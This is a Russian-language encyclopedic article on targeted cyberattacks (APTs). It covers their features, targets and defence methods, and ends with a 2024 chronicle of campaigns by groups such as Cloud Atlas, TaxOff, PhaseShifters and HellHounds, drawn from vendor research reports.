2024/12/14 17:13:32

Advanced Persistent Threat (APT)
Таргетированные или целевые кибератаки
"Развитая устойчивая угроза"

Особенность целенаправленных атак (APT) заключается в том, что злоумышленников интересует конкретная компания или государственная организация. Это отличает данную угрозу от массовых хакерских атак – когда одновременно атакуется большое число целей и наименее защищенные пользователи становятся жертвой. Целенаправленные атаки обычно хорошо спланированы и включают несколько этапов — от разведки и внедрения до уничтожения следов присутствия. Как правило, в результате целенаправленной атаки злоумышленники закрепляются в инфраструктуре жертвы и остаются незамеченными в течение месяцев или даже лет – на протяжении всего этого времени они имеют доступ ко всей корпоративной информации.

Содержание

Сложности классификации

Таргетированные или целевые атаки – атаки, направленные в отношении конкретных коммерческих организаций или государственных ведомств. Как правило, такие атаки не носят массовый характер и готовятся достаточно длительный период. Злоумышленники изучают информационные системы атакуемого объекта, узнают, какое программное обеспечение используется в тех или иных целях. Объектами атаки являются весьма ограниченные какими-либо рамками или целями конкретные информационные системы и/или люди. Вредоносное ПО специально разрабатывается для атаки, чтобы штатные антивирусы и средства защиты, используемые объектом и достаточно хорошо изученные злоумышленниками, не смогли обнаружить угрозу. Чаще всего это уязвимости нулевого дня и особые алгоритмы связи с исполнителями/заказчиками атаки.

Юрий Черкас, руководитель направления инфраструктурных ИБ-решений Центра информационной безопасности компании «Инфосистемы Джет» cчитает, что практически постоянная полемика вокруг определения термина «таргетированная атака» затрудняет классификацию этого термина. Он отмечает, что целевая атака использует те же механизмы взлома, что и любая другая (спам, фишинг, заражение часто посещаемых сайтов и т.д.). «На мой взгляд, одним из основных признаков таргетированной атаки является ее явная направленность на конкретную организацию. Например, вирус, написанный для конкретного ПО собственной разработки конкретной организации. Но так бывает далеко не всегда. Хакер может использовать имеющиеся у него наборы эксплойтов и другие инструменты для атаки на компанию-жертву. В этом случае определить, относится ли атака к таргетированной, достаточно сложно, так как для проведения атаки использовались уязвимости распространенных ОС и прикладного ПО», говорит Юрий Черкас.

Сложности при квалификации целевых атак - один из факторов, который не позволяет рассчитать даже их приблизительное количество.

КДУ (Комплексные Долговременные Угрозы)

Категория киберпреступлений, преследующих цели в бизнесе и политике

Большинство специалистов сходится во мнении относительно следующих особенностей целевых так[1]:

  • Это атаки, направленные в отношении конкретных коммерческих организаций, отраслей производства или государственных ведомств.
  • Объектами атаки являются весьма ограниченные какими-либо рамками или целями конкретные информационные системы.
  • Эти атаки не носят массовый характер и готовятся достаточно длительный период.
  • Вредоносное ПО, если оно используется при реализации атаки, специально разрабатывается для конкретной атаки, чтобы штатные средства защиты, достаточно хорошо изученные злоумышленниками, не смогли обнаружить ее реализацию.
  • Для реализации атаки могут использоваться уязвимости нулевого дня.
  • Как правило, целевые атаки используются для кражи информации, которую легко монетизировать, либо для нарушения доступности к критически важной информации.
  • При осуществлении целевой атаки используются те же механизмы взлома, что и при массовых атаках, в частности фишинг. Отличие составляет подготовка атаки с целью предотвращения возможности ее детектирования средствами защиты. Именно применительно к целевым атакам фишинг становится очень актуальной угрозой, поскольку атака в этом случае осуществляется не на абстрактные, а на конкретные физические лица, что может быть учтено методами социальной инженерии.
  • После обнаружения и идентификации целевой атаки, уже по итогам ее осуществления, об угрозе этой атаки становится известно, она переходит в категорию «массовых» - может массово использоваться злоумышленниками. При этом, как идентифицированная, угроза этой атаки уже может детектироваться средствами защиты, одной из задач которых является обеспечение минимальной продолжительности перехода угрозы атаки из категории целевых в массовые.

Фазы целевой атаки

Течение APT-атаки

Цели атак

По данным A.T. Kearney:

  • Офис правления компании. Часто аппаратура ненадлежащим образом защищена от физического повреждения (например, со стороны персонала по уборке или техническому обслуживанию помещений).
  • НИОКР. Обычно это отдел, требующий самого высокого уровня защиты, но зачастую он защищен не лучше, чем другие отделы.
  • Центры обработки данных представляют собой надежную среду для размещения частного облака. Проблемой является обеспечение безопасного функционирования многочисленных серверов, а также приложений, работающих на этих серверах.
  • Сеть поставщиков. Из-за расширяющегося применения сетевых решений при работе с поставщиками возникают риски, связанные с тем, что относительно небольшие компании-поставщики, как правило, хуже защищены.
  • Облачные вычисления.В основе своей использование внешнего облака безопасно. Проблемы связаны с тем, что уровень защиты данных зависит от законодательства и что возможен доступ со стороны спецслужб.
  • Производство. Множество старых специализированных систем все чаще объединяется в сети, и их работу трудно отслеживать и контролировать. Атаки злоумышленников в этом случае могут привести к производственным потерям или даже к краху компании.
  • Базы данных обеспечивают безопасное хранение важной информации. Главная слабость – то, что в качестве «инструментов» для проникновения в базы данных взломщики могут использовать администраторов.
  • Конечная продукция, активируемая с помощью информационных технологий. Растущий уровень использования сетевых решений для обеспечения функционирования конечной продукции облегчает проведение кибератак. Дистанционно контролируя устройства пользователей с целью провоцирования поломок, хакеры имеют возможность незаконно получать через эти устройства конфиденциальную информацию. В связи с этим компании может грозить потеря репутации и получение исков от пользователей, ставших жертвами мошенничества
  • Офисные сети. Растущий уровень сетевого взаимодействия, предусматривающего объединение почти всех систем, предоставляет хакеру богатые возможности, если он сумеет проникнуть в сеть
  • Продажи. Утечка маркетинговых планов, информации о ценах и клиентах подрывает репутацию компании и лишает ее конкурентных преимуществ.
  • Мобильные устройства. Покупая смартфоны, доступные на коммерческом рынке, пользователи часто вводят в их память конфиденциальные данные, которые, как правило, без труда могут быть похищены хакерами. Самые испытанные и надежные концепции обеспечения безопасности могут оказаться бесполезными, если сотрудники компании используют собственные мобильные устройства для решения рабочих задач.
  • Интернет-магазины. Для незаконного доступа под видом реально существующих покупателей и совершения мошеннических действий хакеры используют реквизиты кредитных карт и личные данные клиентов.
  • Телефонные звонки. Эксплуатируя готовность людей помогать друг другу, злоумышленники могут использовать телефонные звонки как способ легкого получения нужной информации.

Таргетированные атаки в финансовой сфере

В обзоре о несанкционированных переводах денежных средств в 2014 году, опубликованном ЦБ РФ накануне, отмечается, что 23 кредитные организации сообщили об инцидентах, имеющих признаки целевых атак. Эксперты подсчитали, что инциденты были направлены на списание средств на сумму 213,4 млн рублей.

Все инциденты связаны с вешним воздействием на ИТ-инфраструктуру в том числе и с внедрением вредоносного кода, благодаря которому высокотехнологичные преступники намеревались выводить средства. TAdviser Security 100: Крупнейшие ИБ-компании в России 59.8 т

Попытки взлома имеют типовые особенности: атака была целевой и учитывала особенности процессов отправки и обработки сообщений в определенной платежной системе; вредоносный код в ряде случаев стандартными средствами антивирусной защиты не выявлялся, несмотря на актуальные антивирусные базы; зафиксированы также факты проникновения хакеров в локальные сети банков, чтобы, в том числе, с помощью попыток внедрения вредоносного кода через электронные сообщения.

Представители банков констатируют: если раньше мошенники предпочитали грабить клиентов, то теперь переключились на более крупную добычу, а именно – на сами финансово-кредитные учреждения.

«Это более сложная процедура, но с точки зрения выгоды хакерам удобнее взламывать банки, где деньги лежат в одном месте. Основной тенденцией становятся так называемые таргетированные атаки. Они готовятся месяцами и в отношении конкретных банков и финансовых организаций. Это реальная угроза, от которой очень сложно защитится даже продвинутым в плане информационной безопасности банкам. Злоумышленники достаточно хорошо изучили банковское ПО, АБС, средства защиты и так далее», - отмечает Юрий Лысенко, начальник управления информационной безопасности банка Хоум Кредит.
С ним соглашается и Станислав Павлунин, вице-президент по безопасности Тинькофф Банка: «Целевые атаки идут бок р бок с социальной инженерией. DDoS-атаки никуда не исчезли, однако работать с ними гораздо проще, чем с вирусами, которые злоумышленники пишут для целенаправленных действий. Стандартные антивирусы не обнаруживают зловредных объектов, которые написаны для объекта атаки. Системы, которые позволяют фиксировать такие целевые атаки на конкретную финансовую организацию и выявлять риски на лету – это другой класс безопасности», - погалает Станислав Павлунин.

В то же время Юрий Лысенко прогнозирует увеличение числа целевых атак на конкретные банки и финансовые организации, системы дистанционного банковского обслуживания и т.д.

Методики целевой атаки

Публично доступная информация о средствах проведения таргетированных атак и расследовании инцидентов (которые имеют признаки целевых атак) позволяют говорить о разнообразии методов. Например, могут использоваться полностью автоматизированные методы, так и телефонные звонки.

Злоумышленники в ходе атаки исследуют различные возможности, чтобы получить доступ к необходимой информации. Может осуществляться прямой физический доступ или атаковаться сотрудники компании, их устройства и учетные записи в интернет-сервисах.

«Существенной проблемой становится безопасность смежных информационных систем – компаний-поставщиков (особенно разработчиков ПО, осуществляющих поддержку своего продукта) и клиентов. Доверенные отношения с ними могут быть использованы для обхода граничных средств защиты. Это значительно расширяет и без того сложный периметр защиты», - говорит Алексей Качалин, заместитель генерального директора компании «Перспективный мониторинг».

Уйти от попыток таргетированных атак жертве вряд ли удастся. Например, злоумышленник хочет получить доступ к внутренним ресурсам интересующей его компании. Для этой цели злоумышленник может инициировать множество целевых атак, на протяжении нескольких месяцев или лет. Все элементы атаки (сетевые атаки, вредоносное ПО) могут быть предварительно проверены на «заметность» для распространенных методов обнаружения. В случае неэффективности такие элементы модифицируются. Аналогично обновлению антивирусных баз могут обновляться и средства вторжения, в том числе и те, что уже функционируют в захваченной системе.

Дополнительная сложность – продолжительность и интенсивность таргетированной атаки. Подготовка может занимать месяцы, а активная фаза – минуты. «Существует вероятность, что рано или поздно атака удастся. В конце концов проблема 0-day уязвимостей актуальна всегда. Если у вас есть информация, которая стоит 100 млн, то будьте готовы к тому, что найдется кто-то готовый потратить 50 млн на то чтобы ее украсть. Поэтому единственное что можно сделать – это быть готовым к компрометации и иметь инструменты для быстрого обнаружения атаки, ее пресечения и минимизации ущерба», - считает Александр Гостев, главный антивирусный эксперт «Лаборатории Касперского».

Установление организаторов

Большинство из таргетированных атак обнаруживается постфактум. Самой большой проблемой остается атрибуция – установление организаторов и исполнителей таких атак.

Установление виновника – это чрезвычайно сложная задача, уверены эксперты. В этом процессе необходимо собрать максимальное число факторов, которые бы указывали на причастность хакерской группы определенной национальности или организации к совершению преступления. Для этого необходимо взаимодействие между компаниями, работающими в сфере информационной безопасности, жертвами, правоохранительными органами разных стран и т.д. Но и в этом случае устанавливаются только единицы виновников, чаще всего из-за грубых ошибок атакующих.

«Для определения источника атаки необходимо учитывать множество факторов. Прежде всего, это анализ кода – в нем могут содержаться слова, косвенно указывающие на языковую или национальную принадлежность авторов. Например, русские слова, написанные латиницей, или ошибки, которые обычно свойственны именно русским авторам и т.д. Однако киберпреступники могут намеренно оставлять такие ложные следы, запутывая тем самым следствие», - говорил Александр Гостев.

Более 100 группировок целенаправленно атакуют коммерческие и госорганизации

Эксперты из глобального центра исследований и анализа угроз «Лаборатории Касперского» сообщили летом 2016 года, что в мире активно более 100 групп, организующих кампании кибершпионажа и атаки класса АРТ, и под их прицел попадают коммерческие и государственные организации в 85 странах мира.

По мнению представителей компании, столь динамичное развитие этой угрозы говорит о том, что целевые атаки перестали быть уделом избранных: злоумышленники оптимизируют свои техники и инструменты, и это удешевляет и упрощает организацию вредоносной кампании, что, в свою очередь, способствует появлению новых игроков.

Основная цель атаки класса АРТ — кража конфиденциальной информации, которую впоследствии можно использовать для получения геополитического преимущества или продажи заинтересованным лицам. По наблюдениям «Лаборатории Касперского», наибольшему риску стать жертвой целевой атаки подвергаются правительственные и дипломатические организации, финансовые компании, предприятия, работающие в энергетической и космической отраслях, учреждения в сфере здравоохранения и образования, телекоммуникационные и ИТ-компании, поставщики для вооруженных сил, а также общественные и политические активисты.

«Мы изучаем сложные целевые атаки более шести лет и с уверенностью можем сказать, что в последнее время они все чаще применяются не только для шпионажа, но и для кражи денег. Целевые атаки затрагивают самые разные организации, их жертвой могут стать отнюдь не только государственные учреждения. Не меньший интерес для злоумышленников представляют крупные компании, обладающие ценной интеллектуальной собственностью или имеющие доступ к большим финансовым активам, — рассказал Юрий Наместников, руководитель российского исследовательского центра «Лаборатории Касперского». — В такой ситуации раннее выявление целевой атаки критически важно для любой организации, желающей сохранить свои конфиденциальные данные. Однако с помощью традиционных защитных решений сделать это очень сложно, поскольку злоумышленники часто используют нетривиальные методы и тщательно скрывают свою активность. Так что компаниям могут помочь либо аналитические сервисы, либо специальные решения для выявления целевых атак».

Методы защиты и предотвращения атак

Основными средствами защиты от целевых атак сегодня являются средства детектирования всевозможных аномалий (кода, команд, поведения и т.д.). При этом:

  • Детектирование аномалий в рамках отдельно взятого компьютера, либо корпоративной ИС в целом, осуществляется с целью обнаружения реализуемых, а также частично, либо полностью реализованных атак.
  • Обеспечивается возможность нейтрализации известных атак на ранних стадиях их осуществления – решается задача защиты информации, что обеспечивается возможностью однозначной идентификации выявленной аномалии как события реализации атаки, как следствие, осуществления автоматической реакции на зафиксированное аномальное событие.
  • В отношении неизвестных угроз атак, к которым относятся угрозы целевых атак, детектирование аномалий неизбежно связано с ошибками первого (при поверхностном анализе событий) и второго (при глубоком анализе) рода. В данном случае, особенно при глубоком анализе, а иначе какого-либо смысла детектирование аномалий не имеет, технологически невозможна однозначная идентификация выявленной аномалии как события реализации атаки, в результате чего невозможна и автоматическая реакция на зарегистрированное событие, которое лишь с некоторой вероятностью может являться атакой. Задача детектирования аномалий в данном случае сводится не к защите информации, а к проведению соответствующего дальнейшего исследования по зарегистрированному факту реализации атаки, с целью максимально оперативной однозначной идентификации атаки.
  • После однозначной идентификации аномалии, как атаки (атака становится известной, а ее угроза уже не угроза целевой, а угроза массовой атаки), в отношении этой атаки детектором аномалий уже реализуется защита информации.


Практически все вендоры имеют в своей линейке продукт, который позиционируется как средство защиты от таргетированных атак. К их числу можно отнести FireEye, CheckPoint, McAfee и т.д. Эффективность защиты от таргетированных атак не может всецело определяться только применяемыми техническими средствами.

«Если говорить о технических средствах, то их эффективность будет рассматриваться сквозь призму поставленных компанией целей и задач, что лучше оценивать в рамках проведения пилотных проектов в конкретной среде. Подобно любым решениям продукты по защите от таргетированных атак имеют как свои сильные стороны, так и слабые», - считает Алина Сагидуллина, консультант по информационной безопасности компании «ЛАНИТ-Интеграция».
Возможность оперативно реагировать на таргетированные атаки имеют центры мониторинга информационной безопасности. Такие центры могут комплексно анализировать состояние атакуемой системы через системы защиты информации; с помощью экспертов, сконцентрированных на анализе информационной безопасности в наблюдаемой системе; при мониторинге фактов компрометации и утечки информации; совокупном анализе крупных информационных систем. «Это позволяет увидеть схожие признаки аномалий в различных сегментах информационной системы», - рассказывает Алексей Качалин.

Технологии защиты от таргетированных атак были и раньше, но сейчас они выходят на новый уровень. В первую очередь речь идет о различных инструментах для выявления аномалий – как на локальных компьютерах, так и на уровне сетевой активности. Задачей таких систем является поиск всего необычного, что происходит, а не поиск вредоносного года. Это объясняется тем, что во многих случаях атакующие могут вообще не использовать вредоносные программы.

«К этим системам добавляется активно развивающийся класс SIEM – «Security information and event management», позволяющий агрегировать вместе поступающие системные события от разных систем защиты (антивирусов, файрволов, эмуляторов, роутеров и т.д.) и видеть в реальном времени все происходящие изменения», - говорит Александр Гостев.

Почему недостаточно традиционных систем защиты

Из-за специфики целенаправленных атак и подготовки к ним, таких как:

  • детальное изучение используемых средств защиты с целью их обхода;
  • написание уникального ПО и закрепление его в инфраструктуре цели;
  • использование в атаках доверенных, но скомпрометированных объектов, не создающих негативный фон;
  • применение мультивекторного подхода к проникновению;
  • скрытность и пр.

Из-за присущих традиционным средствам защиты технологических ограничений:

  • обнаружение направлено только на распространённые (несложные) угрозы, уже известные уязвимости и методы;
  • нет встроенного сопоставления и корреляции детектов в единую цепочку событий;
  • нет технологий выявления отклонений в нормальных активностях и анализа работы легитимного ПО.

Необходим комплексный подход

Deception-ловушки

Новые средства появились и продолжают появляться. Однако их эффективность напрямую зависит от качества их настройки. По словам Юрия Черкаса, основными технологическими направлениями средств защиты являются:

  • песочницы, которые имитируют рабочие станции организации. В песочницах файлы, получаемые из интернета, запускаются и анализируются. Если запускаемый файл влечет за собой деструктивное воздействие, то такой файл определяется как зараженный;
  • анализ аномальной сетевой активности (например, на базе NetFlow), который осуществляется путем сравнения текущей сетевой активности с построенной эталонной моделью сетевого поведения. Например, компьютер или сервер, который всегда коммуницирует с некоторым набором определенных сетевых ресурсов по определенным протоколам, вдруг неожиданно начинает пробовать обращаться напрямую к базам данным;
  • поведенческий анализ рабочих станций, также основанный на сравнении активности рабочих станций с эталонной моделью. Разница в том, что этот анализ осуществляется не на уровне сети, а на уровне самой рабочей станции с помощью агентов. Не так давно появилась интересная технология, которая отслеживает процессы Windows. В случае отклонения от эталонной модели процесс Windows блокируется, тем самым не давая эксплойту выполнить деструктивное воздействие.

«Нюанс в том, что все эти технологии предполагают анализ поведения. В этом случае ошибки 1-го (false positives) и 2-го рода (false negatives) неизбежны, поэтому эффективность сильно зависит от квалификации сотрудников, настраивающих и эксплуатирующих эти решения», - отмечает Юрий Черкас.
Компоненты защиты от таргетированных атак

Deception - сеть замаскированных сетевых ловушек и приманок, которые разбросаны по всей ИТ-инфраструктуре

Как действует злоумышленник: Хакеры находясь в вашей сети постоянно продвигаются к своей цели

Что обеспечит Deception

  • Обнаружение в режиме реального времени целенаправленных атак и атак нулевого дня
  • Защиту реальных ИТ-активов за счет переключения активности атакующих на «ловушки»
  • Защиту ценных данных от «шифровальщиков»
  • Сбор форензики о действиях злоумышленников
  • Отсутствие ложных срабатываний
  • Не использует агентов и не оказывает влияния на работу пользователей и ИТ-сервисов

Компоненты защиты от таргетированных атак

Результаты

  • Профиль злоумышленника
  • Детализированные методы и инструменты, используемые во время атаки
  • Углубленный анализ (какие цели преследуют хакеры, какую информацию они ищут)
  • История и хронология взлома
  • Источники происхождения злоумышленников на основе их IP-адресов и данных DNS

Ущерб от атак – большая загадка даже для жертв

Подсчитать реальный ущерб от таргетированных атак не представляется реальным: по данным ESET‬, 66% инцидентов системы безопасности остаются незамеченными многие месяцы. Именно под это и «заточено» сложное вредоносное ПО‬ для целевых атак: кража данных происходит незаметно, в «фоновом» режиме.

Большое количество атак остается незамеченными. При обнаружении многие компании стараются скрыть факт инцидента и не предавать его огласке. В «Лаборатории Касперского» считают, что каждую неделю в мире становится известно как минимум об одной громкой целевой атаке. В реальности таких громких атак в неделю может происходить более ста.

В исследовании FireEye за 2013 год зафиксировано из 39,5 тыс. уникальных инцидентов, которые были обнаружены их устройствами, 4,1 тыс. атаки были ассоциированы с APT. При этом Россия не вошла в TOP-10 стран, на которые нацелено большинство APT. Это, скорее всего, может объясняться используемыми источниками данных.

Количество таргетированных атак в мире по итогам какого-либо года достаточно сложно оценить. Александр Гостев, отмечает, что в год в мире могут совершаться десятки тысяч инцидентов с целевыми атаками. «Россия находится в общемировом тренде и крупные российские компании и государственные структуры, по моим оценкам, минимум раз в месяц подвергаются попыткам целенаправленного заражения», - отмечает он.

Хроника

2024

АРТ-группировка Cloud Atlas атакует госсектор России и Белоруссии

В отдел реагирования на угрозы ИБ экспертного центра безопасности Positive Technologies обратилась за помощью российская государственная организация, обнаружившая фишинговую рассылку. Расследование показало, что этот инцидент является частью кампании против госучреждений России и Белоруссии, за которой специалисты департамента исследования угроз PT ESC наблюдают с октября 2024 года. За кибератаками стоит APT-группировка с десятилетним стажем Cloud Atlas. Об этом Positive Technologies сообщили 12 декабря 2024 года.

Атака, к расследованию которой привлекли команду PT ESC IR, была обнаружена на раннем этапе, когда злоумышленники проводили разведку. Благодаря своевременному реагированию сотрудников организации и специалистов PT ESC им не удалось закрепиться в ИТ-инфраструктуре и нанести значительный ущерб. Группировка Cloud Atlas действует с 2014 года. Эксперты Positive Technologies ранее сообщали о ее атаках на правительство разных стран. Однако данная фишинговая волна нацелена в основном на госорганы России и Белоруссии.

Раньше в качестве приманок группировка использовала файлы Microsoft Word с текстами на темы геополитики, а в новых атаках документы содержали официальные запросы на предоставление информации. Последние на момент проведения кампании не отслеживались средствами антивирусной защиты. В потоки таблиц этих файлов была вшита ссылка на вредоносный шаблон, который посредством эксплуатации уязвимости в редакторе формул Microsoft Equation запускал скрипты, выполнявшие команды C2-сервера. В результате на устройства жертв доставлялись инструменты для дальнейшего развития атаки, в частности бэкдор PowerShower, который группировка уже использовала ранее в целях шпионажа и кражи данных.

«
За десять лет арсенал Cloud Atlas не претерпел значительных изменений: группировка так же применяет облачные сервисы в качестве командно-контрольного сервера. Например, в данной кампании модули ВПО хранились на Яндекс Диске. Однако недавние атаки носят экспериментальный характер: их главное отличие от более ранних в том, что киберпреступники вместо стандартного С2 использовали документ, созданный в Google Sheets, онлайн-приложении для работы с электронными таблицами, — отметил Александр Григорян, заместитель руководителя департамента комплексного реагирования на киберугрозы экспертного центра безопасности Positive Technologies. — В целом мы видим, что Cloud Atlas совершенствует свои тактики, техники и инструментарий, а также развивает собственное ВПО, повышая его эффективность в условиях усиления защиты ИТ-инфраструктур.
»

Группировка TaxOff использует сложный бэкдор в атаках на российский госсектор

Специалисты департамента исследования угроз экспертного центра безопасности Positive Technologies (PT Expert Security Center) обнаружили APT-группировку, которая атакует организации российского государственного сектора. В зафиксированной серии инцидентов для проникновения в ИТ-инфраструктуру злоумышленники использовали фишинговые электронные письма на темы финансов и права — в связи с этим эксперты назвали группировку TaxOff. Киберпреступники применяли в атаках высокотехнологичный бэкдор, который способен оставаться незаметным даже при одновременном выполнении множества задач. Об этом Positive Technologies сообщили 28 ноября 2024 года.

Группировка преследовала две основные цели — шпионаж и закрепление в инфраструктуре для развития дальнейших атак. Эксперты обнаружили несколько фишинговых писем, которые использовались как начальные векторы проникновения. В одном из них была ссылка на облачное хранилище с вредоносным содержимым, в другом — поддельный установщик специального ПО для госслужащих, предназначенного для заполнения различных справок.

Взаимодействие с письмами вело к заражению сложным бэкдором — эксперты назвали его Trinper. Вредонос написан на языке C++ и имеет многопоточную архитектуру, что позволяло ему параллельно выполнять разные действия: собирать и выгружать данные, мониторить файловую систему на появление чувствительных данных, поддерживать связь с командно-контрольным сервером. В бэкдоре реализована конфигурация, которая обеспечивают гибкую настройку Trinper. Кроме того, бэкдор кэширует часто используемые данные и за счет этого быстрее выполняет операции, повышая свою производительность.

«
Благодаря многопоточности и другим архитектурным особенностям Trinper дает злоумышленникам возможность получать устойчивый доступ к скомпрометированным системам и одновременно выполнять многочисленные вредоносные действия. При этом бэкдор не оказывает значительного влияния на производительность инфраструктуры, поэтому может долгое время оставаться незамеченным, — сказал Владислав Лунин, старший специалист группы исследования сложных угроз, экспертного центра безопасности Positive Technologies. — Сочетание высокотехнологичного вредоноса с приманками на волнующие темы делает атаки TaxOff особенно опасными и трудными для обнаружения. Это подчеркивает необходимость регулярного повышения осведомленности сотрудников организаций об актуальных киберугрозах и построения многоуровневой защиты от сложных инцидентов.
»

Чтобы не стать жертвами подобных атак, эксперты советуют пользователям соблюдать стандартные правила кибергигиены: внимательно читать электронные письма от любых отправителей, не открывать подозрительные вложения и не переходить по сомнительным ссылкам, даже если темы сообщений крайне актуальны. Компаниям специалисты рекомендуют тщательно проверять сетевой трафик, чтобы своевременно обнаруживать скрытые киберугрозы.

APT-группировка PhaseShifters атакует российские компании с помощью стеганографии

Специалисты департамента исследования угроз экспертного центра безопасности Positive Technologies (PT Expert Security Center) обнаружили сценарии атак, направленные на российские госучреждения, промышленные компании и исследовательские центры. Об этом компания сообщила 1 ноября 2024 года. Жертвами стали десятки организаций. Злоумышленники использовали набирающую популярность технику стеганографии, которая позволяет скрывать вредоносное ПО в пересылаемых изображениях и текстовых файлах. Эксперты отмечают, что киберпреступники практически в точности повторяют сценарии атак группировки TA558 — о ней Positive Technologies сообщала в апреле 2024 года.

По версии специалистов PT ESC, обнаруженные факты атак совершила уже известная группировка, занимающаяся шпионажем, внимание которой направлено на различные отрасли стран Восточной Европы, в том числе на государственные учреждения, сферу экономики и промышленности. Эксперты Positive Technologies атрибутировали атаки как совершенные группировкой PhaseShifters (также она известна под именем Sticky Werewolf). В своих атаках группировка использует фишинг: злоумышленники отправляют письма якобы от официальных лиц с просьбой ознакомиться с документом и подписать его. В результате на устройства попадает вредоносное ПО, такое как Rhadamanthys, DarkTrack RAT, Meta Stealer и др.

Кибератаки начинались с рассылки фишинговых писем с вложениями в виде защищенных паролями архивов, которые содержали вредоносные файлы. В ходе исследования были изучены десятки документов, среди которых встречались, например, резюме или дополнительные соглашения на подпись. Когда жертвы открывали файлы, на их устройства загружались скрипты, скачивающие изображения — в них с помощью стеганографии была скрыта полезная нагрузка. Эксперты предполагают, что эту технику PhaseShifters могла заимствовать у группировки TA558, которая на ноябрь 2024 года атакует организации по всему миру. Дальнейший анализ цепочек атак привел исследователей к еще более интересному выводу. Эту же технику и тот же криптер использует UAC-0050 (UAC-0096) — группировка, по данным ряда исследователей, с 2020 года атакующая организации на территории России, Украины, Польши, Белоруссии, Молдовы, стран Прибалтики.

«
Мы наблюдаем высокую активность группировки PhaseShifters с весны 2023 года (другие российские исследователи позже назвали ее Sticky Werewolf) и уже тогда заметили интересные детали. Атаки группировки по техникам идентичны цепочкам атак другой группировки — UAC-0050. Более того, атаки этих группировок проходят с небольшим временным промежутком, то есть злоумышленники одинаково атакуют с разницей в несколько недель, — сказал Денис Кувшинов, руководитель TI-департамента экспертного центра безопасности Positive Technologies. — Мы склоняемся к тому, что UAC-0050 и PhaseShifters — это одна и та же группировка, но подтвердить это можно будет только после более длительного наблюдения.
»

Специалисты экспертного центра безопасности Positive Technologies рекомендуют пользователям внимательнее подходить к письмам с вложениями, даже если они отправлены от имени известных компаний или государственных организаций. Компаниям же следует пристальнее мониторить сетевой трафик, а также проверять подозрительную активность, связанную с легитимными сервисами, особенно с использованием командных оболочек PowerShell, CMD и сред выполнения сценариев, например WScript.

Киберпреступники атакуют госсектор, телекоммуникации и ВПК стран Юго‑Восточной Азии

Компания Positive Technologies 25 июля 2024 года опубликовала исследование деятельности APT-группировок, атакующих организации в странах Юго-Восточной Азии. Больше всего атак в регионе пришлось на Филиппины и Вьетнам. В тройку самых атакуемых отраслей региона вошли государственные учреждения, телекоммуникационные компании и военно-промышленный комплекс.

Согласно исследованию, в топ-5 стран региона по числу атакующих APT-группировок входят Филиппины (85%), Вьетнам (85%), Таиланд (70%), Малайзия (70%) и Индонезия (60%).

«
Юго-Восточная Азия является важной территорией как с точки зрения мировой экономики, так и с точки зрения геополитики. Мы проанализировали деятельность 20 APT-группировок, атаковавших Юго-Восточную Азию за период с января 2020 года по апрель 2024 года. Все они нацелены на государственные организации региона. Под ударом также телекоммуникационные компании, их атакуют 60% APT-группировок соответственно, а каждая вторая группировка предпринимает действия, направленные на организации военно-промышленного комплекса. Кроме того, более трети киберпреступных группировок атакуют предприятия из сфер науки и образования (45%), промышленности (40%) и финансов (35%), — рассказала Яна Авезова, старший аналитик исследовательской группы Positive Technologies.
»

Телекоммуникации также находятся под пристальным вниманием злоумышленников, в том числе благодаря распространению в регионе технологии 5G. Поскольку темпы внедрения технологий в Юго-Восточной Азии опережают развитие кибербезопасности, быстрое развертывание телекоммуникаций 5G может увеличивать рост числа кибератак на эту отрасль.

Как выяснили аналитики Positive Technologies, три четверти исследованных APT-группировок начинают кибератаки с фишинговых рассылок, а половина из них эксплуатируют уязвимости в общедоступных системах, например в серверах Microsoft Exchange. Фишинговые кампании, согласно исследованию, нередко привязаны по времени к значимым для региона событиям, включая саммиты АСЕАН. Ряд APT-группировок (30%) используют в качестве первоначального этапа атаку типа watering hole, размещая на веб-сайтах скрипты, которые незаметно загружают на компьютеры посетителей вредоносные программы.

Проникнув в сеть, злоумышленники начинают исследовать среду, в которой они оказались. По данным экспертов Positive Technologies, большинство (80%) APT-группировок стремятся идентифицировать пользователей скомпрометированных узлов. Эту информацию можно использовать для повышения привилегий или продвижения в инфраструктуре. Из исследованных APT-группировок 70% собирают данные о конфигурации сети, а также просматривают файлы и каталоги в поисках полезной информации. Еще 60% APT-группировок изучают запущенные на узле процессы, что помогает им составить представление об установленных средствах защиты.

В арсенале изученных экспертами APT-группировок есть множество инструментов, в том числе уникальное ПО собственной разработки. В то же время все они используют в атаках легитимные инструменты, которые уже есть в скомпрометированной системе. Это позволяет им маскировать свои действия под действия ИТ-персонала и избегать обнаружения. Так, 70% APT-группировок применяют Cobalt Strike — коммерческое ПО, которое создавалось как инструмент для тестирования на проникновение, но обширные функциональные возможности которого сегодня активно эксплуатируются злоумышленниками. Например, подгруппа Earth Longzhi группировки APT41 в атаках на организации Филиппин, Таиланда, Малайзии и Индонезии использовала специальные версии загрузчиков Cobalt Strike со сложными механизмами защиты от обнаружения. Вкупе с другими техниками это позволило злоумышленникам оставаться незамеченными в инфраструктуре жертв с сентября 2021 года по июнь 2022-го.

Для борьбы со сложными целевыми атаками и построения эффективной системы защиты эксперты Positive Technologies рекомендуют организациям обратить внимание на основы подхода результативной кибербезопасности, которые включают:

инвентаризацию IT-активов;

  • мониторинг и реагирование на инциденты;
  • повышение киберграмотности сотрудников;
  • оценку защищенности.

APT-группировка HellHounds атакует российские организации третий год подряд

Эксперты компании Positive Technologies 23 мая 2024 года опубликовали результаты своего очередного исследования деятельности APT-группировки HellHounds, которая активно атакует российские организации в критических сферах. Количество пострадавших по состоянию на май насчитывало десятки организаций в таких отраслях, как ИТ, транспорт, энергетика и др. Пострадали также госучреждения и аэрокосмические компании.

Специалисты Positive Technologies обнаружили HellHounds в ноябре 2023 года: уже тогда она активно атаковала инфраструктуру российских компаний с использованием бэкдора под Linux Decoy Dog. Недавнее исследование компании показало, что у него есть и Windows-версия. Первые атаки с использованием Decoy Dog под Windows были отмечены 1-2 января 2024 года.

Фрагмент Decoy Dog

Decoy Dog является деривативом опенсорсного проекта Pupy RAT. Судя по образцам, перехваченным исследователями, разработка Decoy Dog началась не позднее конца 2019 года, а самый свежий сэмпл датирован январем 2024 года.

Детальная схема работы Decoy Dog (Windows)

В свою очередь, SSL-сертификаты, которые в бэкдоре используются для шифрования соединений с командным сервером (удаленными узлами), датированы 2021-2023 годами. Из этого может следовать, что кампания против российских предприятий была развернута в 2021 году.

Что касается методов проникновения, то, как пишут исследователи, минимум в двух случаях злоумышленники использовали инфраструктуру подрядчиков, чтобы попасть в сети целевых организаций. При этом происходила компрометация учетных данных для входа по протоколу SSH.

